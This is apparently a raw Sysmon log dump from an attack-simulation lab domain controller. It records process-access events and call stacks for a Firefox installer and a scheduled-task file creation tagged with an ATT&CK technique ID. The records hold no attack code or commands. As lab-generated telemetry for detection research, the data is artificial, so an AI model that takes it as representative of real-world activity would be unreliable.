(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64)|C:\Windows\System32\SHELL32.dll+345ae4(wow64) 10341000x800000000000000016422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64)|C:\Windows\System32\SHELL32.dll+345a77(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64)|C:\Windows\System32\SHELL32.dll+345a77(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64) 10341000x800000000000000016419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64)|C:\Windows\System32\SHELL32.dll+345a77(wow64) 11241100x800000000000000016418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:59:53.521{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB2021-01-18 13:59:53.521 11241100x800000000000000016417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:59:53.521{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Mozilla2021-01-18 13:59:53.521 10341000x800000000000000016416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.521{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.521{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
